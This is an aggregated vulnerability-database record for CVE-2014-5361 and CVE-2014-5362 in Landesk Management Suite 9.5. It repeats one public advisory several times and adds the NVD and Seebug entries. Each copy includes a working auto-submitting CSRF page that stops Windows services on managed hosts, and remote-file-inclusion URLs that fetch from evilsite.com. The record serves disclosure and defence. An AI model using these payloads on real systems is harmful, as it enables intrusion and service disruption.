{"id": "1337DAY-ID-23535", "lastseen": "2018-04-12T19:48:08", "viewCount": 10, "bulletinFamily": "exploit", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "edition": 2, "enchantments": {"score": {"value": 6.8, "vector": "NONE", "modified": "2018-04-12T19:48:08", "rev": 2}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14479", "SECURITYVULNS:DOC:32094"]}, {"type": "cve", "idList": ["CVE-2014-5362", "CVE-2014-5361"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:131496"]}, {"type": "seebug", "idList": ["SSV:89636"]}], "modified": "2018-04-12T19:48:08", "rev": 2}, "vulnersScore": 6.8}, "type": "zdt", "sourceHref": "https://0day.today/exploit/23535", "description": "Landesk Management Suite version 9.5 suffers from cross site request forgery and remote file inclusion vulnerabilities.", "title": "Landesk Management Suite 9.5 RFI / CSRF Vulnerabilities", "cvelist": ["CVE-2014-5361", "CVE-2014-5362"], "sourceData": "Exploit Title: Landesk Management Suite RFI and CSRF vulnerabilities\r\nProduct: Landesk Management Suite\r\nVulnerable Versions: 9.5 (and possible previous versions), 9.6\r\nTested Version: 9.5\r\nAdvisory Publication: 16/04/2015\r\nLatest Update: 16/04/2015\r\nVulnerability Type: Cross-site request forgery [CWE-352], Remote File Inclusion [CWE-829]\r\nCVE Reference: CVE-2014-5361, CVE-2014-5362\r\nCredit: Alex Haynes\r\n\r\nAdvisory Details:\r\n\r\n\r\n(1) Vendor & Product Description\r\n--------------------------------\r\n\r\nVendor:\r\nLANDESK\r\n\r\nProduct & Version:\r\nLandesk Management Suite v9.5\r\n\r\nVendor URL & Download:\r\nhttp://www.landesk.com/products/management-suite/\r\n\r\nProduct Description:\r\n\"Manage all your users\u2019 multi-platform desktops and mobile devices. Integrate several IT disciplines\r\ninto a single management experience that speeds software distribution, ensures software license compliance,\r\nsimplifies OS provisioning, saves power costs, provides secure remote control, and manages Mac OS X.\"\r\n\r\n\r\n(2) Vulnerability Details:\r\n--------------------------\r\nThe admin interface of Landesk Management Suite can be exploited by Remote File Inclusion (RFI) and Cross-site Request forgery (CSRF) attacks.\r\n\r\nProof of concept for CSRF [CVE-2014-5361]:\r\n-----------------------------------------\r\nURL: https://<LANDESK>/remote/serverServices.aspx?cidn=5&d=serverServices&tb=serverInfo_services.tb&gid=groupSW_Services&itemid=SW_Services&UID=SW_Services_SW_ROOT\r\nAttack Pattern: \r\n\r\nCertain functionalities of landesk are vulnerable to cross-site request forgeries, which can be used to force users to, among other things,\r\nmanipulate windows services and processes on host machines. \r\n\r\nExample code below:\r\n<!-- CSRF for Landesk, allowing stop, start or restart of arbitrary services OR processes on host machine -->\r\n<html>\r\n<head>\r\n<script>\r\n<!-- For illustration only, Skype and Adobe Acrobat Update Services are shut down / Replace with any windows service on host machine -->\r\nwindow.onload = function() {\r\n document.getElementById(\"csrfForm1\").submit();\r\n document.getElementById(\"csrfForm2\").submit();\r\n }\r\n\r\n</script>\r\n</head>\r\n<body>\r\n<form id=\"csrfForm1\" action=\"https://landesk/remote/serverServices.aspx?cidn=5&d=serverServices&tb=serverInfo_services.tb&gid=groupSW_Services&itemid=SW_Services&UID=SW_Services_SW_ROOT\" method=\"POST\" enctype=\"multipart/form-data\" target=\"csrfIframe1\">\r\n <input type=\"hidden\" name=\"op\" value=\"stop\" />\r\n <input type=\"hidden\" name=\"name\" value=\"Adobe Acrobat Update Service\" />\r\n</form>\r\n\r\n<form id=\"csrfForm2\" action=\"https://landesk/remote/serverServices.aspx?cidn=5&d=serverServices&tb=serverInfo_services.tb&gid=groupSW_Services&itemid=SW_Services&UID=SW_Services_SW_ROOT\" method=\"POST\" enctype=\"multipart/form-data\" target=\"csrfIframe2\">\r\n <input type=\"hidden\" name=\"op\" value=\"stop\" />\r\n <input type=\"hidden\" name=\"name\" value=\"Skype Updater\" />\r\n</form>\r\n\r\n<iframe style=\"display:hidden\" height=\"0\" width=\"0\" frameborder=\"0\" name\"csrfIframe1\"></iframe> \r\n<iframe style=\"display:hidden\" height=\"0\" width=\"0\" frameborder=\"0\" name\"csrfIframe2\"></iframe>\r\n</body>\r\n</html>\r\n\r\n\r\nProof of concept for RFI [CVE-2014-5362]:\r\n-----------------------------------------\r\n\r\nThere are numerous URLs within the landesk management suite that can be used to call upon remote files due to the use of relative paths.\r\nThis can be leveraged to introduce remote file inclusion vulnerabilities as you can present external content through the landesk server.\r\n\r\nURLs:\r\nhttps://<LANDESK>/ldms/sm_actionfrm.asp?cmd=dir&ht=1&d=//<RFI here>\r\nhttps://<LANDESK>/remote/frm_coremainfrm.aspx?tb=cust_qry.tb&d=//<RFI here>&bfn=swd_top&node=4&baseType=group1&groupID=1646&groupType=null&ownerID=56\r\nhttps://<LANDESK>/remote/frm_splitfrm.aspx?top=//<RFI here>&ttb=dirman.tb&ftr=frm_tasktabsfrm&tabf=dirman_tabs&tf=dirman_top&bottom=frm_taskfrm&bbd=SoftwareDistribution/ldaplist&bf=dirlist_bottom&bd=frm_coremainfrm&btb=dirlist.tb&pct=50\r\n\r\nParameter names: \"d\" & \"top\"\r\nParameter Type: GET\r\nAttack Pattern:\r\nThe Remote File must finish in .aspx but the extension is not referenced explicitly in the URL. It will be fetched in HTTPS.\r\nd=//<any external URL here>/<filenamehere>(.aspx)\r\nexample:\r\nhttps://<LANDESK>/ldms/sm_actionfrm.asp?cmd=dir&ht=1&d=//evilsite.com/myevilaspxfile\r\n\r\n\r\n(3) Advisory Timeline:\r\n----------------------\r\n15/09/2014 - First Contact\r\n23/10/2014 - Request for update on fix. No ETA given.\r\n21/11/2014 - Request for update on fix. No ETA given.\r\n22/12/2014 - Request for update on fix. No ETA given.\r\n22/01/2015 - Request for update on fix. No ETA given.\r\n13/04/2015 - Final request for update and notice of public disclosure given. No ETA for fix.\r\n16/04/2015 - Public disclosure\r\n\r\n(4)Solution:\r\n------------\r\nNo fix at this time.\r\n\r\n\r\n(5) Credits:\r\n------------\r\nDiscovered by Alex Haynes\r\n\r\nReferences:\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5361\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5362\r\nhttp://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5361\r\nhttp://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5362\n\n# 0day.today [2018-04-12] #", "published": "2015-04-19T00:00:00", "references": [], "reporter": "Alex Haynes", "modified": "2015-04-19T00:00:00", "href": "https://0day.today/exploit/description/23535", "immutableFields": []}

{"securityvulns": [{"lastseen": "2018-08-31T11:10:59", "bulletinFamily": "software", "cvelist": ["CVE-2014-5361", "CVE-2014-5362"], "description": "\r\n\r\nExploit Title: Landesk Management Suite RFI and CSRF vulnerabilities\r\nProduct: Landesk Management Suite\r\nVulnerable Versions: 9.5 &#40;and possible previous versions&#41;, 9.6\r\nTested Version: 9.5\r\nAdvisory Publication: 16/04/2015\r\nLatest Update: 16/04/2015\r\nVulnerability Type: Cross-site request forgery [CWE-352], Remote File Inclusion [CWE-829]\r\nCVE Reference: CVE-2014-5361, CVE-2014-5362\r\nCredit: Alex Haynes\r\n\r\nAdvisory Details:\r\n\r\n\r\n&#40;1&#41; Vendor &amp; Product Description\r\n--------------------------------\r\n\r\nVendor:\r\nLANDESK\r\n\r\nProduct &amp; Version:\r\nLandesk Management Suite v9.5\r\n\r\nVendor URL &amp; Download:\r\nhttp://www.landesk.com/products/management-suite/\r\n\r\nProduct Description:\r\n&quot;Manage all your users\u2019 multi-platform desktops and mobile devices. Integrate several IT disciplines\r\ninto a single management experience that speeds software distribution, ensures software license compliance,\r\nsimplifies OS provisioning, saves power costs, provides secure remote control, and manages Mac OS X.&quot;\r\n\r\n\r\n&#40;2&#41; Vulnerability Details:\r\n--------------------------\r\nThe admin interface of Landesk Management Suite can be exploited by Remote File Inclusion &#40;RFI&#41; and Cross-site Request forgery &#40;CSRF&#41; attacks.\r\n\r\nProof of concept for CSRF [CVE-2014-5361]:\r\n-----------------------------------------\r\nURL: https://&lt;LANDESK&gt;/remote/serverServices.aspx?cidn=5&amp;d=serverServices&amp;tb=serverInfo_services.tb&amp;gid=groupSW_Services&amp;itemid=SW_Services&amp;UID=SW_Services_SW_ROOT\r\nAttack Pattern: \r\n\r\nCertain functionalities of landesk are vulnerable to cross-site request forgeries, which can be used to force users to, among other things,\r\nmanipulate windows services and processes on host machines. \r\n\r\nExample code below:\r\n&lt;!-- CSRF for Landesk, allowing stop, start or restart of arbitrary services OR processes on host machine --&gt;\r\n&lt;html&gt;\r\n&lt;head&gt;\r\n&lt;script&gt;\r\n&lt;!-- For illustration only, Skype and Adobe Acrobat Update Services are shut down / Replace with any windows service on host machine --&gt;\r\nwindow.onload = function&#40;&#41; {\r\n\tdocument.getElementById&#40;&quot;csrfForm1&quot;&#41;.submit&#40;&#41;;\r\n\tdocument.getElementById&#40;&quot;csrfForm2&quot;&#41;.submit&#40;&#41;;\r\n\t}\r\n\r\n&lt;/script&gt;\r\n&lt;/head&gt;\r\n&lt;body&gt;\r\n&lt;form id=&quot;csrfForm1&quot; action=&quot;https://landesk/remote/serverServices.aspx?cidn=5&amp;d=serverServices&amp;tb=serverInfo_services.tb&amp;gid=groupSW_Services&amp;itemid=SW_Services&amp;UID=SW_Services_SW_ROOT&quot; method=&quot;POST&quot; enctype=&quot;multipart/form-data&quot; target=&quot;csrfIframe1&quot;&gt;\r\n &lt;input type=&quot;hidden&quot; name=&quot;op&quot; value=&quot;stop&quot; /&gt;\r\n &lt;input type=&quot;hidden&quot; name=&quot;name&quot; value=&quot;Adobe Acrobat Update Service&quot; /&gt;\r\n&lt;/form&gt;\r\n\r\n&lt;form id=&quot;csrfForm2&quot; action=&quot;https://landesk/remote/serverServices.aspx?cidn=5&amp;d=serverServices&amp;tb=serverInfo_services.tb&amp;gid=groupSW_Services&amp;itemid=SW_Services&amp;UID=SW_Services_SW_ROOT&quot; method=&quot;POST&quot; enctype=&quot;multipart/form-data&quot; target=&quot;csrfIframe2&quot;&gt;\r\n &lt;input type=&quot;hidden&quot; name=&quot;op&quot; value=&quot;stop&quot; /&gt;\r\n &lt;input type=&quot;hidden&quot; name=&quot;name&quot; value=&quot;Skype Updater&quot; /&gt;\r\n&lt;/form&gt;\r\n\r\n&lt;iframe style=&quot;display:hidden&quot; height=&quot;0&quot; width=&quot;0&quot; frameborder=&quot;0&quot; name&quot;csrfIframe1&quot;&gt;&lt;/iframe&gt;\t \r\n&lt;iframe style=&quot;display:hidden&quot; height=&quot;0&quot; width=&quot;0&quot; frameborder=&quot;0&quot; name&quot;csrfIframe2&quot;&gt;&lt;/iframe&gt;\r\n&lt;/body&gt;\r\n&lt;/html&gt;\r\n\r\n\r\nProof of concept for RFI [CVE-2014-5362]:\r\n-----------------------------------------\r\n\r\nThere are numerous URLs within the landesk management suite that can be used to call upon remote files due to the use of relative paths.\r\nThis can be leveraged to introduce remote file inclusion vulnerabilities as you can present external content through the landesk server.\r\n\r\nURLs:\r\nhttps://&lt;LANDESK&gt;/ldms/sm_actionfrm.asp?cmd=dir&amp;ht=1&amp;d=//&lt;RFI here&gt;\r\nhttps://&lt;LANDESK&gt;/remote/frm_coremainfrm.aspx?tb=cust_qry.tb&amp;d=//&lt;RFI here&gt;&amp;bfn=swd_top&amp;node=4&amp;baseType=group1&amp;groupID=1646&amp;groupType=null&amp;ownerID=56\r\nhttps://&lt;LANDESK&gt;/remote/frm_splitfrm.aspx?top=//&lt;RFI here&gt;&amp;ttb=dirman.tb&amp;ftr=frm_tasktabsfrm&amp;tabf=dirman_tabs&amp;tf=dirman_top&amp;bottom=frm_taskfrm&amp;bbd=SoftwareDistribution/ldaplist&amp;bf=dirlist_bottom&amp;bd=frm_coremainfrm&amp;btb=dirlist.tb&amp;pct=50\r\n\r\nParameter names: &quot;d&quot; &amp; &quot;top&quot;\r\nParameter Type: GET\r\nAttack Pattern:\r\nThe Remote File must finish in .aspx but the extension is not referenced explicitly in the URL. It will be fetched in HTTPS.\r\nd=//&lt;any external URL here&gt;/&lt;filenamehere&gt;&#40;.aspx&#41;\r\nexample:\r\nhttps://&lt;LANDESK&gt;/ldms/sm_actionfrm.asp?cmd=dir&amp;ht=1&amp;d=//evilsite.com/myevilaspxfile\r\n\r\n\r\n&#40;3&#41; Advisory Timeline:\r\n----------------------\r\n15/09/2014 - First Contact\r\n23/10/2014 - Request for update on fix. No ETA given.\r\n21/11/2014 - Request for update on fix. No ETA given.\r\n22/12/2014 - Request for update on fix. No ETA given.\r\n22/01/2015 - Request for update on fix. No ETA given.\r\n13/04/2015 - Final request for update and notice of public disclosure given. No ETA for fix.\r\n16/04/2015 - Public disclosure\r\n\r\n&#40;4&#41;Solution:\r\n------------\r\nNo fix at this time.\r\n\r\n\r\n&#40;5&#41; Credits:\r\n------------\r\nDiscovered by Alex Haynes\r\n\r\nReferences:\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5361\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5362\r\nhttp://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5361\r\nhttp://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5362\r\n\r\n", "edition": 1, "modified": "2015-05-12T00:00:00", "published": "2015-05-12T00:00:00", "id": "SECURITYVULNS:DOC:32094", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32094", "title": "[CVE-2014-5361][CVE-2014-5362]Landesk Management Suite RFI &amp; CSRF Security Vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:00", "bulletinFamily": "software", "cvelist": ["CVE-2015-2750", "CVE-2015-2172", "CVE-2015-0225", "CVE-2014-9258", "CVE-2015-2843", "CVE-2015-0845", "CVE-2015-2845", "CVE-2014-2027", "CVE-2014-8764", "CVE-2015-2844", "CVE-2014-8360", "CVE-2014-2685", "CVE-2014-5361", "CVE-2014-8762", "CVE-2015-2206", "CVE-2015-2934", "CVE-2014-8761", "CVE-2015-2938", "CVE-2015-2749", "CVE-2014-8763", "CVE-2015-2933", "CVE-2014-5020", "CVE-2015-2939", "CVE-2014-2682", "CVE-2014-5021", "CVE-2015-2940", "CVE-2014-2983", "CVE-2014-3704", "CVE-2015-2781", "CVE-2014-9253", "CVE-2015-2842", "CVE-2014-8089", "CVE-2015-2690", "CVE-2015-2932", "CVE-2015-2937", "CVE-2014-5019", "CVE-2015-1773", "CVE-2015-2559", "CVE-2014-5022", "CVE-2015-2931", "CVE-2014-2684", "CVE-2014-4914", "CVE-2014-5362", "CVE-2014-5032", "CVE-2015-2936", "CVE-2015-2935", "CVE-2014-2683", "CVE-2014-2681", "CVE-2015-2560"], "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 1, "modified": "2015-05-12T00:00:00", "published": "2015-05-12T00:00:00", "id": "SECURITYVULNS:VULN:14479", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14479", "title": "Web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2021-02-02T06:14:31", "description": "The admin interface in Landesk Management Suite 9.6 and earlier allows remote attackers to conduct remote file inclusion attacks involving ASPX pages from third-party sites via the d parameter to (1) ldms/sm_actionfrm.asp or (2) remote/frm_coremainfrm.aspx; or the (3) top parameter to remote/frm_splitfrm.aspx.", "edition": 6, "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-09-19T15:29:00", "title": "CVE-2014-5362", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5362"], "modified": "2018-10-09T19:50:00", "cpe": ["cpe:/a:landesk:landesk_management_suite:9.6"], "id": "CVE-2014-5362", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5362", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:landesk:landesk_management_suite:9.6:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:14:31", "description": "Multiple cross-site request forgery (CSRF) vulnerabilities in Landesk Management Suite 9.6 and earlier allow remote attackers to hijack the authentication of administrators for requests that (1) start, (2) stop, or (3) restart services via a request to remote/serverServices.aspx.", "edition": 6, "cvss3": {}, "published": "2015-04-21T15:59:00", "title": "CVE-2014-5361", "type": "cve", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5361"], "modified": "2018-10-09T19:50:00", "cpe": ["cpe:/a:landesk:landesk_management_suite:9.6"], "id": "CVE-2014-5361", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5361", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:landesk:landesk_management_suite:9.6:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2016-12-05T22:20:40", "description": "", "published": "2015-04-19T00:00:00", "type": "packetstorm", "title": "Landesk Management Suite 9.5 RFI / CSRF", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-5361", "CVE-2014-5362"], "modified": "2015-04-19T00:00:00", "id": "PACKETSTORM:131496", "href": "https://packetstormsecurity.com/files/131496/Landesk-Management-Suite-9.5-RFI-CSRF.html", "sourceData": "`Exploit Title: Landesk Management Suite RFI and CSRF vulnerabilities \nProduct: Landesk Management Suite \nVulnerable Versions: 9.5 (and possible previous versions), 9.6 \nTested Version: 9.5 \nAdvisory Publication: 16/04/2015 \nLatest Update: 16/04/2015 \nVulnerability Type: Cross-site request forgery [CWE-352], Remote File Inclusion [CWE-829] \nCVE Reference: CVE-2014-5361, CVE-2014-5362 \nCredit: Alex Haynes \n \nAdvisory Details: \n \n \n(1) Vendor & Product Description \n-------------------------------- \n \nVendor: \nLANDESK \n \nProduct & Version: \nLandesk Management Suite v9.5 \n \nVendor URL & Download: \nhttp://www.landesk.com/products/management-suite/ \n \nProduct Description: \n\"Manage all your users\u0092 multi-platform desktops and mobile devices. Integrate several IT disciplines \ninto a single management experience that speeds software distribution, ensures software license compliance, \nsimplifies OS provisioning, saves power costs, provides secure remote control, and manages Mac OS X.\" \n \n \n(2) Vulnerability Details: \n-------------------------- \nThe admin interface of Landesk Management Suite can be exploited by Remote File Inclusion (RFI) and Cross-site Request forgery (CSRF) attacks. \n \nProof of concept for CSRF [CVE-2014-5361]: \n----------------------------------------- \nURL: https://<LANDESK>/remote/serverServices.aspx?cidn=5&d=serverServices&tb=serverInfo_services.tb&gid=groupSW_Services&itemid=SW_Services&UID=SW_Services_SW_ROOT \nAttack Pattern: \n \nCertain functionalities of landesk are vulnerable to cross-site request forgeries, which can be used to force users to, among other things, \nmanipulate windows services and processes on host machines. \n \nExample code below: \n<!-- CSRF for Landesk, allowing stop, start or restart of arbitrary services OR processes on host machine --> \n<html> \n<head> \n<script> \n<!-- For illustration only, Skype and Adobe Acrobat Update Services are shut down / Replace with any windows service on host machine --> \nwindow.onload = function() { \ndocument.getElementById(\"csrfForm1\").submit(); \ndocument.getElementById(\"csrfForm2\").submit(); \n} \n \n</script> \n</head> \n<body> \n<form id=\"csrfForm1\" action=\"https://landesk/remote/serverServices.aspx?cidn=5&d=serverServices&tb=serverInfo_services.tb&gid=groupSW_Services&itemid=SW_Services&UID=SW_Services_SW_ROOT\" method=\"POST\" enctype=\"multipart/form-data\" target=\"csrfIframe1\"> \n<input type=\"hidden\" name=\"op\" value=\"stop\" /> \n<input type=\"hidden\" name=\"name\" value=\"Adobe Acrobat Update Service\" /> \n</form> \n \n<form id=\"csrfForm2\" action=\"https://landesk/remote/serverServices.aspx?cidn=5&d=serverServices&tb=serverInfo_services.tb&gid=groupSW_Services&itemid=SW_Services&UID=SW_Services_SW_ROOT\" method=\"POST\" enctype=\"multipart/form-data\" target=\"csrfIframe2\"> \n<input type=\"hidden\" name=\"op\" value=\"stop\" /> \n<input type=\"hidden\" name=\"name\" value=\"Skype Updater\" /> \n</form> \n \n<iframe style=\"display:hidden\" height=\"0\" width=\"0\" frameborder=\"0\" name\"csrfIframe1\"></iframe> \n<iframe style=\"display:hidden\" height=\"0\" width=\"0\" frameborder=\"0\" name\"csrfIframe2\"></iframe> \n</body> \n</html> \n \n \nProof of concept for RFI [CVE-2014-5362]: \n----------------------------------------- \n \nThere are numerous URLs within the landesk management suite that can be used to call upon remote files due to the use of relative paths. \nThis can be leveraged to introduce remote file inclusion vulnerabilities as you can present external content through the landesk server. \n \nURLs: \nhttps://<LANDESK>/ldms/sm_actionfrm.asp?cmd=dir&ht=1&d=//<RFI here> \nhttps://<LANDESK>/remote/frm_coremainfrm.aspx?tb=cust_qry.tb&d=//<RFI here>&bfn=swd_top&node=4&baseType=group1&groupID=1646&groupType=null&ownerID=56 \nhttps://<LANDESK>/remote/frm_splitfrm.aspx?top=//<RFI here>&ttb=dirman.tb&ftr=frm_tasktabsfrm&tabf=dirman_tabs&tf=dirman_top&bottom=frm_taskfrm&bbd=SoftwareDistribution/ldaplist&bf=dirlist_bottom&bd=frm_coremainfrm&btb=dirlist.tb&pct=50 \n \nParameter names: \"d\" & \"top\" \nParameter Type: GET \nAttack Pattern: \nThe Remote File must finish in .aspx but the extension is not referenced explicitly in the URL. It will be fetched in HTTPS. \nd=//<any external URL here>/<filenamehere>(.aspx) \nexample: \nhttps://<LANDESK>/ldms/sm_actionfrm.asp?cmd=dir&ht=1&d=//evilsite.com/myevilaspxfile \n \n \n(3) Advisory Timeline: \n---------------------- \n15/09/2014 - First Contact \n23/10/2014 - Request for update on fix. No ETA given. \n21/11/2014 - Request for update on fix. No ETA given. \n22/12/2014 - Request for update on fix. No ETA given. \n22/01/2015 - Request for update on fix. No ETA given. \n13/04/2015 - Final request for update and notice of public disclosure given. No ETA for fix. \n16/04/2015 - Public disclosure \n \n(4)Solution: \n------------ \nNo fix at this time. \n \n \n(5) Credits: \n------------ \nDiscovered by Alex Haynes \n \nReferences: \nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5361 \nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5362 \nhttp://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5361 \nhttp://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5362 \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/131496/landesk-rfixsrf.txt"}], "seebug": [{"lastseen": "2017-11-19T12:31:49", "description": "1\u3001\u4ea7\u54c1\u4e0e\u578b\u53f7\r\n```\r\nLANDesk Management Suite (LDMS) 7 Base | 8 Base | 8.1 Base | 8.5 Base | 8.6 Base | 8.7 Base, SP1, SP2, SP3, SP4, SP5 | 8.70 Base, .7.1, .7.2 | 8.8 Base | 8.80 Base, .1.1 | 9 .0, .1, .2, .3, .4, .5, .6\r\n```\r\n2\u3001\u516c\u5e03\u65f6\u95f4\uff1a2015-8-18\r\n\r\n3\u3001CVE:CVE-2014-5362\r\n\r\n4\u3001\u6f0f\u6d1e\u7c7b\u578b\uff1a\u8fdc\u7a0b\u6587\u4ef6\u5305\u542b\r\n\r\n5\u3001\u6f0f\u6d1e\u8be6\u60c5\uff1a\r\n```\r\nA vulnerability in LANDESK Management Suite could allow an unauthenticated, remote attacker to conduct remote file inclusion attacks on a targeted system.\r\n\r\nThe vulnerability is due to insufficient validation of user-supplied input by the affected software. An unauthenticated, remote attacker could exploit the vulnerability by persuading a user to follow a malicious link. A successful exploit could allow the attacker to upload arbitrary files to the system.\r\n\r\nProof-of-concept code that exploits this vulnerability is publicly available.\r\n```\r\n6\u3001\u6f0f\u6d1e\u5f71\u54cd\u5371\u5bb3\uff1a\r\n```\r\nLANDESK Management Suite contains a vulnerability that could allow an unauthenticated, remote attacker to conduct remote file inclusion attacks on a targeted system\r\n```", "published": "2015-10-10T00:00:00", "type": "seebug", "title": "LANDESK Management Suite Remote File Include Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-5362"], "modified": "2015-10-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-89636", "id": "SSV:89636", "sourceData": "", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": ""}]}